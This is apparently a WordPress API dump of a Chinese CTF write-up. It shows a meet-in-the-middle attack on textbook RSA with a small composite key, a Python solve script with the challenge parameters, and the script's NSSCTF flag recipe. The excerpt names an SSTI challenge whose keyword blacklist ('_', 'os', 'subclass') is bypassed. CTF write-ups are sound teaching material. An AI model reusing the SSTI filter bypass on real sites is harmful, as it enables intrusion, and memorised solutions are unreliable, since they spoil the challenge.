      2.\u82e5\u5c06KEY\u5206\u89e3\u4e3ax*y\uff0c\u5219ck \u2261 (x*y)^e mod n\u3002\u5bfb\u627e\u6ee1\u8db3\u6b64\u6761\u4ef6\u7684x\u548cy\u3002<\/p>\r\n
      3.\u4e2d\u95f4\u76f8\u9047\u653b\u51fb\uff1a<\/p>\r\n
      \u9884\u8ba1\u7b97\u6240\u6709\u53ef\u80fd\u7684i\uff08\u8303\u56f42\u52302^19\uff09\uff0c\u8ba1\u7b97ck * (i^e)^{-1} mod n\u5e76\u5b58\u50a8\u3002\u8be5\u503c\u5bf9\u5e94(KEY\/i)^e mod n\u3002
      \u904d\u5386\u53ef\u80fd\u7684x\uff08\u8303\u56f42\u52302^20\uff09\uff0c\u8ba1\u7b97x^e mod n\uff0c\u5728\u9884\u8ba1\u7b97\u7684\u503c\u4e2d\u67e5\u627e\u5339\u914d\u9879\u3002\u82e5\u5b58\u5728\uff0c\u5219x = KEY\/i\uff0c\u5373KEY = x*i\u3002<\/p>\r\n
      4.\u9a8c\u8bc1\u4e0e\u6062\u590d\uff1a<\/p>\r\n
      \u627e\u5230\u6709\u6548\u7684x\u548ci\u540e\uff0c\u8ba1\u7b97KEY = x*i\uff0c\u5e76\u9a8c\u8bc1\u5176\u4f4d\u6570\u548c\u662f\u5426\u4e3a\u5408\u6570\u3002<\/p>\r\n
      5.\u4f7f\u7528KEY\u7684MD5\u54c8\u5e0c\u751f\u6210flag<\/p>\r\n
      exp:<\/p>\r\n
      from Crypto.Util.number import inverse
      from gmpy2 import is_prime
      from hashlib import md5
      import bisect
      n = 26563847822899403123579768059987758748518109506340688366937229057385768563897579939399589878779201509595131302887212371556759550226965583832707699167542469352676806103999861576255689028708092007726895892953065618536676788020023461249303717579266840903337614272894749021562443472322941868357046500507962652585875038973455411548683247853955371839865042918531636085668780924020410159272977805762814306445393524647460775620243065858710021030314398928537847762167177417552351157872682037902372485985979513934517709478252552309280270916202653365726591219198063597536812483568301622917160509027075508471349507817295226801011
      e = 65537
      ck = 8371316287078036479056771367631991220353236851470185127168826270131149168993253524332451231708758763231051593801540258044681874144589595532078353953294719353350061853623495168005196486200144643168051115479293775329183635187974365652867387949378467702492757863040766745765841802577850659614528558282832995416523310220159445712674390202765601817050315773584214422244200409445854102170875265289152628311393710624256106528871400593480435083264403949059237446948467480548680533474642869718029551240453665446328781616706968352290100705279838871524562305806920722372815812982124238074246044446213460443693473663239594932076
      precomputed = []
      for i in range(2, 2**19):
      ieval = pow(i, e, n)
      inv_ieval = inverse(ieval, n)
      val = (ck * inv_ieval) % n
      precomputed.append((val, i))
      precomputed.sort()
      KEY = None
      for x in range(2, 2**20):
      x_val = pow(x, e, n)
      idx = bisect.bisect_left(precomputed, (x_val, 0))
      if idx < len(precomputed) and precomputed[idx][0] == x_val:
      i = precomputed[idx][1]
      candidate = x * i
      if candidate.bit_length() == 36 and not is_prime(candidate):
      KEY = candidate
      break
      if KEY is None:
      raise ValueError(\"Valid KEY not found\")
      flag = b'NSSCTF{' + md5(str(KEY).encode()).hexdigest().encode() + b'}'
      print(flag.decode())

      <\/pre>\r\n
      AI<\/span><\/h2>\r\n
      AI Cat Girl<\/span><\/h3>\r\n
      [\u53c2\u8003\u6587\u732e<\/span>] \u00a0https:\/\/blog.csdn.net\/CleverLee0\/article\/details\/145882823?utm_medium=distribute.pc_relevant.none-task-blog-2~default~baidujs_baidulandingword~default-5-1458828\u00a0<\/span><\/div>\r\n
      \r\n\r\n<\/p>\r\n
      \"\"<\/figure>\r\n
      \r\n\r\n<\/p>\r\n
       <\/p>\r\n
      \u00a0<\/p>\r\n
      \r\n\r\n<\/p>\r\n
       <\/p>\r\n
      \r\n\r\n<\/p>\r\n
       <\/p>\r\n
      <\/p>","protected":false},"excerpt":{"rendered":"
      —–by Hurkin Web upload?SSTI! \u7b80\u5355\u7684waf\u7ed5\u8fc7 \u9ed1\u540d\u5355 [‘_’, ‘os’, ‘subclas &#","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"emotion":"","emotion_color":"","title_style":"","license":"","_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1],"tags":[],"class_list":["post-58","post","type-post","status-publish","format-standard","hentry","category-some-competition"],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/58","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/comments?post=58"}],"version-history":[{"count":22,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/58\/revisions"}],"predecessor-version":[{"id":122,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/posts\/58\/revisions\/122"}],"wp:attachment":[{"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/media?parent=58"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/categories?post=58"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hurkin.top\/index.php\/wp-json\/wp\/v2\/tags?post=58"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}